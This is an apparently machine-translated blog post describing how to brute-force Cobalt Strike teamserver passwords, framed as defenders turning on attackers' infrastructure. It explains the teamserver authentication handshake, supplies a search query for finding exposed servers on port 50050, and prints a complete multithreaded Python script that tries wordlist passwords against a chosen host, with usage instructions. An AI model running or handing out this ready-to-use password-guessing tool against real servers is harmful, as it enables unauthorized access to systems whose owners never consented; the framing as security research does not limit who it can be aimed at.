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Blue decides red - burst CS teamserver password
2022-07-03 00:15:00 【Lomi only bear】
0x00: brief introduction
Cobalt strike( Hereinafter referred to as CS)#
as everyone knows ,CS It's an example. MSF On the basis of GUI Frame type “ Multiplayer Sports ” Penetration testing tools , Integrated port forwarding 、 Service scan 、 Automatic overflow , Multimode port monitoring ,exe、powershell Trojan generation, etc .
Fishing attacks include : Site cloning , Target information acquisition ,java perform , Browser automatic attack, etc .
Cobalt Strike Mainly used in team operations , It can be said that it is an artifact of team penetration , It allows multiple attackers to connect to the community server at the same time , Share attack resources with target information and sessions.
Cobalt Strike As a collaboration APT Tools , Penetration testing and actions for intranet apt Control terminal function of , Make it into many APT The organization's first choice .
0x01: origin
1、 Many teams can connect quickly for the convenience of their friends Teamserver, Basically, they are all weak passwords , It's common :123456、123123 etc.
2、 Many also use the default Teamserver port 50050
3、 Gather the weak entry points above , Start testing the burst connection .
0x02: To write
One 、 own teamserver Link test . After the server is set up , Access the test through the browser .google The browser test results are as follows .
The test results in Firefox browser are as follows
F12 See what happens
Two 、 Let's go and have a look at Teamserver Method of authentication .
if [ -e ./cobaltstrike.store ]; then print_info "Will use existing X509 certificate and keystore (for SSL)" else print_info "Generating X509 certificate and keystore (for SSL)" keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias cobaltstrike -dname "CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, S=Cyberspace, C=Earth" fi # start the team server. java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=50050 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=123456 -server -XX:+AggressiveHeap -XX:+UseParallelGC -classpath ./cobaltstrike.jar server.TeamServer $*
The first is the raw data type ostensibly used to protect the authentication of sockets .
The second is based on Java Authentication of serialized objects , This includes user names that are mostly symbols .
among cobaltstrike.store That's true
In the fixed 261 Byte length command , The first authentication request is roughly defined like this :
4 Byte Magic \x00\x00\xBE\xEF 1 Byte Password Length (unsigned int) Password (unsigned int cast char array) Padding \x65 "A" * ( Length( Password ) - 256 )
It looks like this on the wire , But padding is ignored , It could be anything . The authentication routine reads at most 256 individual “ length ”.#
If the password provided matches the password defined when starting the team server , Then the team server will be 4 Byte password to reply .
< This password cannot be empty >
otherwise , The team server returns null
3、 ... and 、python3 Write ideas #
conn.open(host, port) payload = bytearray(b"\x00\x00\xbe\xef") + len(password).to_bytes(1, "big", signed=True) + bytes(bytes(password, "ascii").ljust(256, b"A")) conn.send(payload)
Finally, determine whether the returned result exists “\x00\x00\xca\xfe”, If it exists, the password is correct
Four 、 Look for the roosters Teamserver
"Cobalt strike" && port="50050"
5、 ... and 、 On and off
#!/usr/bin/env python3 import time,socket,ssl,argparse,concurrent.futures,sys MIN_PYTHON = (3, 3) if sys.version_info < MIN_PYTHON: sys.exit("Python %s.%s or later is required.\n" % MIN_PYTHON) parser = argparse.ArgumentParser() parser.add_argument("host", help="Teamserver address") parser.add_argument("wordlist", nargs="?", help="Newline-delimited word list file") args = parser.parse_args() class NotConnectedException(Exception): def __init__(self, message=None, node=None): self.message = message self.node = node class DisconnectedException(Exception): def __init__(self, message=None, node=None): self.message = message self.node = node class Connector: def __init__(self): self.sock = None self.ssl_sock = None self.ctx = ssl.SSLContext() self.ctx.verify_mode = ssl.CERT_NONE pass def is_connected(self): return self.sock and self.ssl_sock def open(self, hostname, port): self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(10) self.ssl_sock = self.ctx.wrap_socket(self.sock) if hostname == socket.gethostname(): ipaddress = socket.gethostbyname_ex(hostname)[2][0] self.ssl_sock.connect((ipaddress, port)) else: self.ssl_sock.connect((hostname, port)) def close(self): if self.sock: self.sock.close() self.sock = None self.ssl_sock = None def send(self, buffer): if not self.ssl_sock: raise NotConnectedException("Not connected (SSL Socket is null)") self.ssl_sock.sendall(buffer) def receive(self): if not self.ssl_sock: raise NotConnectedException("Not connected (SSL Socket is null)") received_size = 0 data_buffer = b"" while received_size < 4: data_in = self.ssl_sock.recv() data_buffer = data_buffer + data_in received_size += len(data_in) return data_buffer def passwordcheck(password): if len(password) > 0: result = None conn = Connector() conn.open(args.host, 50050) payload = bytearray(b"\x00\x00\xbe\xef") + len(password).to_bytes(1, "big", signed=True) + bytes(bytes(password, "ascii").ljust(256, b"A")) conn.send(payload) if conn.is_connected(): result = conn.receive() if conn.is_connected(): conn.close() if result == bytearray(b"\x00\x00\xca\xfe"): return password else: return False else: print("Do not have a blank password!!!") passwords = [] if args.wordlist: passwords = open(args.wordlist).read().split("\n") else: for line in sys.stdin: passwords.append(line.rstrip()) if len(passwords) > 0: attempts = 0 failures = 0 with concurrent.futures.ThreadPoolExecutor(max_workers=30) as executor: future_to_check = {executor.submit(passwordcheck, password): password for password in passwords} for future in concurrent.futures.as_completed(future_to_check): password = future_to_check[future] try: data = future.result() attempts = attempts + 1 if data: print ("Successful Attack!!!") print ("Secquan NB!!") print("Target Password: {}".format(password)) except Exception as exc: failures = failures + 1 print('%r generated an exception: %s' % (password, exc)) else: print("Password(s) required")
Way of execution test.py x.x.x.x pass.txt
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